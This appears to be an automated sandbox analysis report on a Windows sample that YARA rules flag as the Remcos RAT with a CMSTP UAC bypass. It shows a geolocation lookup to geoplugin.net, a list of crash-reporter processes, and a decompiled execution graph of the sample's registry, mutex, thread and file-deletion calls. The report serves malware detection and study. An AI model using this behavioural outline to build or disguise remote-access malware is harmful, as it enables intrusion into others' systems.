                  Aug 31, 2023 17:57:10.030405998 CEST8.8.8.8192.168.2.30x4e09No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                  • geoplugin.net
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349726178.237.33.5080C:\Users\user\Desktop\BiU282bjyR.exe
                  TimestampkBytes transferredDirectionData
                  Aug 31, 2023 17:57:10.065952063 CEST2OUTGET /json.gp HTTP/1.1
                  Host: geoplugin.net
                  Cache-Control: no-cache
                  Aug 31, 2023 17:57:10.095884085 CEST3INHTTP/1.1 200 OK
                  date: Thu, 31 Aug 2023 15:57:10 GMT
                  server: Apache/2.4.52 (Ubuntu)
                  content-length: 945
                  content-type: application/json; charset=utf-8
                  cache-control: public, max-age=300
                  access-control-allow-origin: *
                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 34 2e 31 37 2e 35 32 2e 34 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 33 36 38 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 35 36 37 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 38 37 38 36 0a 7d
                  Data Ascii: { "geoplugin_request":"84.17.52.42", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Zurich", "geoplugin_region":"Zurich", "geoplugin_regionCode":"ZH", "geoplugin_regionName":"Zurich", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.3682", "geoplugin_longitude":"8.5671", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.8786}


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:17:56:59
                  Start date:31/08/2023
                  Path:C:\Users\user\Desktop\BiU282bjyR.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\BiU282bjyR.exe
                  Imagebase:0x400000
                  File size:1'232'384 bytes
                  MD5 hash:111355B58D38248C4F0D96A509CA44E5
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                  Reputation:low
                  Has exited:false

                  Target ID:3
                  Start time:17:57:00
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 840
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:17:57:01
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 844
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:7
                  Start time:17:57:02
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 888
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:9
                  Start time:17:57:03
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 892
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:17:57:04
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 884
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:13
                  Start time:17:57:05
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 844
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:15
                  Start time:17:57:06
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1052
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:17
                  Start time:17:57:07
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1220
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:19
                  Start time:17:57:09
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 912
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:23
                  Start time:17:57:17
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1252
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:25
                  Start time:17:57:18
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 912
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:38
                  Start time:17:57:47
                  Start date:31/08/2023
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1416
                  Imagebase:0x1060000
                  File size:434'592 bytes
                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:4%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:22.9%
                    Total number of Nodes:1223
                    Total number of Limit Nodes:35
                    execution_graph 47033 434293 47038 434565 SetUnhandledExceptionFilter 47033->47038 47035 434298 pre_c_initialization 47039 444f3d 20 API calls 2 library calls 47035->47039 47037 4342a3 47038->47035 47039->47037 47040 4342a5 47041 4342b1 ___DestructExceptionObject 47040->47041 47067 433fb4 47041->47067 47043 4342b8 47045 4342e1 47043->47045 47373 434417 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47043->47373 47054 434320 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47045->47054 47078 443c43 47045->47078 47049 434300 ___DestructExceptionObject 47050 434380 47086 434532 47050->47086 47054->47050 47374 442dc7 35 API calls 6 library calls 47054->47374 47060 4343a2 47061 4343ac 47060->47061 47376 442dff 28 API calls _Atexit 47060->47376 47063 4343b5 47061->47063 47377 442da2 28 API calls _Atexit 47061->47377 47378 43412b 13 API calls 2 library calls 47063->47378 47066 4343bd 47066->47049 47068 433fbd 47067->47068 47379 434643 IsProcessorFeaturePresent 47068->47379 47070 433fc9 47380 438941 10 API calls 4 library calls 47070->47380 47072 433fce 47077 433fd2 47072->47077 47381 443ad0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47072->47381 47074 433fdb 47075 433fe9 47074->47075 47382 43896a 8 API calls 3 library calls 47074->47382 47075->47043 47077->47043 47079 443c5a 47078->47079 47383 4349bb 47079->47383 47081 4342fa 47081->47049 47082 443be7 47081->47082 47083 443c16 47082->47083 47084 4349bb TranslatorGuardHandler 5 API calls 47083->47084 47085 443c3f 47084->47085 47085->47054 47391 4368a0 47086->47391 47088 434545 GetStartupInfoW 47089 434386 47088->47089 47090 443b94 47089->47090 47393 44ea69 47090->47393 47092 43438f 47095 40e7ce 47092->47095 47094 443b9d 47094->47092 47397 446205 35 API calls 47094->47397 47399 41c5e5 LoadLibraryA GetProcAddress 47095->47399 47097 40e7ea GetModuleFileNameW 47404 40f1cc 47097->47404 47099 40e806 47419 4020f6 47099->47419 47102 4020f6 28 API calls 47103 40e824 47102->47103 47425 41b8b0 47103->47425 47107 40e836 47451 401e8d 47107->47451 47109 40e83f 47110 40e852 47109->47110 47111 40e89c 47109->47111 47719 40f9bc 116 API calls 47110->47719 47457 401e65 47111->47457 47114 40e8ac 47118 401e65 22 API calls 47114->47118 47115 40e864 47116 401e65 22 API calls 47115->47116 47117 40e870 47116->47117 47720 410d40 36 API calls __EH_prolog 47117->47720 47119 40e8cb 47118->47119 47462 40531e 47119->47462 47122 40e8da 47467 406383 47122->47467 47123 40e882 47721 40f96d 77 API calls 47123->47721 47127 40e88b 47722 40f1b9 70 API calls 47127->47722 47131 40e894 47133 401fd8 11 API calls 47131->47133 47135 40ed04 47133->47135 47375 442cd6 GetModuleHandleW 47135->47375 47136 401fd8 11 API calls 47137 40e904 47136->47137 47138 401e65 22 API calls 47137->47138 47139 40e90d 47138->47139 47484 401fc0 47139->47484 47141 40e918 47142 401e65 22 API calls 47141->47142 47143 40e931 47142->47143 47144 401e65 22 API calls 47143->47144 47145 40e94c 47144->47145 47146 40e9b7 47145->47146 47723 406b45 47145->47723 47148 401e65 22 API calls 47146->47148 47153 40e9c4 47148->47153 47149 40e979 47150 401fe2 28 API calls 47149->47150 47151 40e985 47150->47151 47152 401fd8 11 API calls 47151->47152 47155 40e98e 47152->47155 47154 40ea0b 47153->47154 47158 4130f7 3 API calls 47153->47158 47488 40ce72 47154->47488 47728 4130f7 RegOpenKeyExA 47155->47728 47157 40ea11 47157->47131 47491 41ad58 47157->47491 47164 40e9ef 47158->47164 47162 40ea2c 47165 40ea7f 47162->47165 47508 40763d 47162->47508 47163 40f158 47811 413557 30 API calls 47163->47811 47164->47154 47731 413557 30 API calls 47164->47731 47168 401e65 22 API calls 47165->47168 47171 40ea88 47168->47171 47181 40ea94 47171->47181 47182 40ea99 47171->47182 47172 40f16e 47812 41227e 65 API calls ___scrt_get_show_window_mode 47172->47812 47173 40ea55 47178 401e65 22 API calls 47173->47178 47174 40ea4b 47732 40765f 30 API calls 47174->47732 47176 40f178 47179 41b6f3 28 API calls 47176->47179 47189 40ea5e 47178->47189 47183 40f188 47179->47183 47180 40ea50 47733 407187 97 API calls 47180->47733 47735 40767c CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47181->47735 47186 401e65 22 API calls 47182->47186 47617 4135d1 RegOpenKeyExW 47183->47617 47187 40eaa2 47186->47187 47512 41b6f3 47187->47512 47189->47165 47193 40ea7a 47189->47193 47190 40eaad 47516 401f13 47190->47516 47734 407187 97 API calls 47193->47734 47197 401f09 11 API calls 47199 40f1a5 47197->47199 47201 401f09 11 API calls 47199->47201 47203 40f1ae 47201->47203 47202 401e65 22 API calls 47204 40eaca 47202->47204 47620 40db4b 47203->47620 47208 401e65 22 API calls 47204->47208 47210 40eae4 47208->47210 47209 40f1b8 47211 401e65 22 API calls 47210->47211 47212 40eafe 47211->47212 47213 401e65 22 API calls 47212->47213 47214 40eb17 47213->47214 47215 40eb84 47214->47215 47216 401e65 22 API calls 47214->47216 47217 40eb93 47215->47217 47223 40ed0f ___scrt_get_show_window_mode 47215->47223 47221 40eb2c _wcslen 47216->47221 47218 40eb9c 47217->47218 47246 40ec18 ___scrt_get_show_window_mode 47217->47246 47219 401e65 22 API calls 47218->47219 47220 40eba5 47219->47220 47222 401e65 22 API calls 47220->47222 47221->47215 47225 401e65 22 API calls 47221->47225 47224 40ebb7 47222->47224 47796 4132a6 RegOpenKeyExA 47223->47796 47228 401e65 22 API calls 47224->47228 47226 40eb47 47225->47226 47229 401e65 22 API calls 47226->47229 47230 40ebc9 47228->47230 47231 40eb5c 47229->47231 47234 401e65 22 API calls 47230->47234 47736 40d83d 47231->47736 47232 40ed5a 47233 401e65 22 API calls 47232->47233 47235 40ed7f 47233->47235 47237 40ebf2 47234->47237 47538 402093 47235->47538 47240 401e65 22 API calls 47237->47240 47239 401f13 28 API calls 47242 40eb7b 47239->47242 47243 40ec03 47240->47243 47245 401f09 11 API calls 47242->47245 47794 40cc02 46 API calls _wcslen 47243->47794 47244 40ed91 47544 41331d RegCreateKeyA 47244->47544 47245->47215 47528 4134f5 47246->47528 47250 40ec13 47250->47246 47252 40ecac ctype 47255 401e65 22 API calls 47252->47255 47253 401e65 22 API calls 47254 40edb3 47253->47254 47550 43b4a1 47254->47550 47256 40ecc3 47255->47256 47256->47232 47260 40ecd7 47256->47260 47259 40edca 47799 41c7b9 87 API calls ___scrt_get_show_window_mode 47259->47799 47262 401e65 22 API calls 47260->47262 47261 40eded 47266 402093 28 API calls 47261->47266 47264 40ece0 47262->47264 47267 41b6f3 28 API calls 47264->47267 47265 40edd1 CreateThread 47265->47261 47268 40ee02 47266->47268 47269 40ecec 47267->47269 47270 402093 28 API calls 47268->47270 47795 40f27d 106 API calls 47269->47795 47272 40ee11 47270->47272 47554 41af84 47272->47554 47273 40ecf1 47273->47232 47275 40ecf8 47273->47275 47275->47131 47277 401e65 22 API calls 47278 40ee22 47277->47278 47279 401e65 22 API calls 47278->47279 47280 40ee34 47279->47280 47281 401e65 22 API calls 47280->47281 47282 40ee54 47281->47282 47283 43b4a1 _strftime 39 API calls 47282->47283 47284 40ee61 47283->47284 47285 401e65 22 API calls 47284->47285 47286 40ee6c 47285->47286 47287 401e65 22 API calls 47286->47287 47288 40ee7d 47287->47288 47289 401e65 22 API calls 47288->47289 47290 40ee92 47289->47290 47291 401e65 22 API calls 47290->47291 47292 40eea3 47291->47292 47293 40eeaa StrToIntA 47292->47293 47578 409d0b 47293->47578 47296 401e65 22 API calls 47297 40eec5 47296->47297 47298 40eed1 47297->47298 47299 40ef0a 47297->47299 47800 433f08 47298->47800 47302 401e65 22 API calls 47299->47302 47304 40ef1a 47302->47304 47303 401e65 22 API calls 47305 40eeed 47303->47305 47307 40ef62 47304->47307 47308 40ef26 47304->47308 47306 40eef4 CreateThread 47305->47306 47306->47299 47310 401e65 22 API calls 47307->47310 47309 433f08 new 22 API calls 47308->47309 47311 40ef2f 47309->47311 47312 40ef6b 47310->47312 47313 401e65 22 API calls 47311->47313 47315 40efd5 47312->47315 47316 40ef77 47312->47316 47314 40ef41 47313->47314 47317 40ef48 CreateThread 47314->47317 47318 401e65 22 API calls 47315->47318 47319 401e65 22 API calls 47316->47319 47317->47307 47320 40efde 47318->47320 47321 40ef87 47319->47321 47323 40f023 47320->47323 47324 40efea 47320->47324 47322 401e65 22 API calls 47321->47322 47326 40ef9c 47322->47326 47603 41b0a2 GetComputerNameExW GetUserNameW 47323->47603 47325 401e65 22 API calls 47324->47325 47328 40eff3 47325->47328 47807 40d7f1 32 API calls 47326->47807 47334 401e65 22 API calls 47328->47334 47330 401f13 28 API calls 47332 40f037 47330->47332 47333 401f09 11 API calls 47332->47333 47336 40f040 47333->47336 47337 40f008 47334->47337 47335 40efaf 47338 401f13 28 API calls 47335->47338 47339 40f049 SetProcessDEPPolicy 47336->47339 47340 40f04c CreateThread 47336->47340 47347 43b4a1 _strftime 39 API calls 47337->47347 47341 40efbb 47338->47341 47339->47340 47342 40f061 CreateThread 47340->47342 47343 40f06d 47340->47343 48563 40f5b0 47340->48563 47344 401f09 11 API calls 47341->47344 47342->47343 47345 40f082 47343->47345 47346 40f076 CreateThread 47343->47346 47348 40efc4 CreateThread 47344->47348 47350 40f0d5 47345->47350 47352 402093 28 API calls 47345->47352 47346->47345 47349 40f015 47347->47349 47348->47315 47808 40bfd7 7 API calls 47349->47808 47614 4130ad RegOpenKeyExA 47350->47614 47353 40f0a5 47352->47353 47809 4052fd 28 API calls 47353->47809 47359 40f0f6 47361 41b6f3 28 API calls 47359->47361 47363 40f106 47361->47363 47810 4131c9 31 API calls 47363->47810 47367 40f11c 47368 401f09 11 API calls 47367->47368 47371 40f127 47368->47371 47369 40f14f DeleteFileW 47370 40f156 47369->47370 47369->47371 47370->47176 47371->47176 47371->47369 47372 40f13d Sleep 47371->47372 47372->47371 47373->47043 47374->47050 47375->47060 47376->47061 47377->47063 47378->47066 47379->47070 47380->47072 47381->47074 47382->47077 47384 4349c6 IsProcessorFeaturePresent 47383->47384 47385 4349c4 47383->47385 47387 434a08 47384->47387 47385->47081 47390 4349cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47387->47390 47389 434aeb 47389->47081 47390->47389 47392 4368b7 47391->47392 47392->47088 47392->47392 47394 44ea72 47393->47394 47396 44ea7b 47393->47396 47398 44e968 48 API calls 4 library calls 47394->47398 47396->47094 47397->47094 47398->47396 47400 41c624 GetModuleHandleA GetProcAddress 47399->47400 47401 41c614 GetModuleHandleA GetProcAddress 47399->47401 47402 41c650 32 API calls 47400->47402 47403 41c63c GetModuleHandleA GetProcAddress 47400->47403 47401->47400 47402->47097 47403->47402 47813 41af3d FindResourceA 47404->47813 47408 40f1f6 ctype 47823 4020b7 47408->47823 47411 401fe2 28 API calls 47412 40f21c 47411->47412 47413 401fd8 11 API calls 47412->47413 47414 40f225 47413->47414 47415 43b715 new 21 API calls 47414->47415 47416 40f236 ctype 47415->47416 47829 406cff 47416->47829 47418 40f269 47418->47099 47420 40210c 47419->47420 47421 4023ce 11 API calls 47420->47421 47422 402126 47421->47422 47423 402569 28 API calls 47422->47423 47424 402134 47423->47424 47424->47102 47883 4020df 47425->47883 47427 41b933 47428 401fd8 11 API calls 47427->47428 47429 41b965 47428->47429 47431 401fd8 11 API calls 47429->47431 47430 41b935 47432 4041a2 28 API calls 47430->47432 47434 41b96d 47431->47434 47435 41b941 47432->47435 47436 401fd8 11 API calls 47434->47436 47438 401fe2 28 API calls 47435->47438 47437 40e82d 47436->47437 47447 40f920 47437->47447 47440 41b94a 47438->47440 47439 401fe2 28 API calls 47446 41b8c3 47439->47446 47441 401fd8 11 API calls 47440->47441 47443 41b952 47441->47443 47442 401fd8 11 API calls 47442->47446 47891 41c852 28 API calls 47443->47891 47446->47427 47446->47430 47446->47439 47446->47442 47887 4041a2 47446->47887 47890 41c852 28 API calls 47446->47890 47448 40f92c 47447->47448 47450 40f933 47447->47450 47898 402163 11 API calls 47448->47898 47450->47107 47452 402163 47451->47452 47456 40219f 47452->47456 47899 402730 11 API calls 47452->47899 47454 402184 47900 402712 11 API calls std::_Deallocate 47454->47900 47456->47109 47458 401e6d 47457->47458 47461 401e75 47458->47461 47901 402158 22 API calls 47458->47901 47461->47114 47463 4020df 11 API calls 47462->47463 47464 40532a 47463->47464 47902 4032a0 47464->47902 47466 405346 47466->47122 47906 4051ef 47467->47906 47469 406391 47910 402055 47469->47910 47472 401fe2 47473 401ff1 47472->47473 47474 402039 47472->47474 47475 4023ce 11 API calls 47473->47475 47481 401fd8 47474->47481 47476 401ffa 47475->47476 47477 40203c 47476->47477 47479 402015 47476->47479 47478 40267a 11 API calls 47477->47478 47478->47474 47925 403098 28 API calls 47479->47925 47482 4023ce 11 API calls 47481->47482 47483 401fe1 47482->47483 47483->47136 47485 401fd2 47484->47485 47486 401fc9 47484->47486 47485->47141 47926 4025e0 28 API calls 47486->47926 47927 401fab 47488->47927 47490 40ce7c CreateMutexA GetLastError 47490->47157 47929 41ba4c 47491->47929 47496 401fe2 28 API calls 47497 41ad94 47496->47497 47498 401fd8 11 API calls 47497->47498 47499 41ad9c 47498->47499 47500 413154 31 API calls 47499->47500 47502 41adf2 47499->47502 47501 41adc5 47500->47501 47503 41add0 StrToIntA 47501->47503 47502->47162 47504 41ade7 47503->47504 47505 41adde 47503->47505 47506 401fd8 11 API calls 47504->47506 47938 41c987 22 API calls 47505->47938 47506->47502 47509 407651 47508->47509 47510 4130f7 3 API calls 47509->47510 47511 407658 47510->47511 47511->47173 47511->47174 47513 41b707 47512->47513 47939 40b779 47513->47939 47515 41b70f 47515->47190 47517 401f22 47516->47517 47524 401f6a 47516->47524 47518 402252 11 API calls 47517->47518 47519 401f2b 47518->47519 47520 401f6d 47519->47520 47521 401f46 47519->47521 47972 402336 47520->47972 47971 40305c 28 API calls 47521->47971 47525 401f09 47524->47525 47526 402252 11 API calls 47525->47526 47527 401f12 47526->47527 47527->47202 47529 413513 47528->47529 47530 406cff 28 API calls 47529->47530 47531 413528 47530->47531 47532 4020f6 28 API calls 47531->47532 47533 413538 47532->47533 47534 41331d 14 API calls 47533->47534 47535 413542 47534->47535 47536 401fd8 11 API calls 47535->47536 47537 41354f 47536->47537 47537->47252 47539 40209b 47538->47539 47540 4023ce 11 API calls 47539->47540 47541 4020a6 47540->47541 47976 4024ed 47541->47976 47545 41336d 47544->47545 47548 413336 47544->47548 47546 401fd8 11 API calls 47545->47546 47547 40eda7 47546->47547 47547->47253 47549 413348 RegSetValueExA RegCloseKey 47548->47549 47549->47545 47551 43b4ba _strftime 47550->47551 47980 43a813 47551->47980 47553 40edc0 47553->47259 47553->47261 47555 41b035 47554->47555 47556 41af9a GetLocalTime 47554->47556 47558 401fd8 11 API calls 47555->47558 47557 40531e 28 API calls 47556->47557 47559 41afdc 47557->47559 47560 41b03d 47558->47560 47561 406383 28 API calls 47559->47561 47562 401fd8 11 API calls 47560->47562 47563 41afe8 47561->47563 47564 40ee16 47562->47564 48008 402f10 47563->48008 47564->47277 47567 406383 28 API calls 47568 41b000 47567->47568 48013 407127 76 API calls 47568->48013 47570 41b00e 47571 401fd8 11 API calls 47570->47571 47572 41b01a 47571->47572 47573 401fd8 11 API calls 47572->47573 47574 41b023 47573->47574 47575 401fd8 11 API calls 47574->47575 47576 41b02c 47575->47576 47577 401fd8 11 API calls 47576->47577 47577->47555 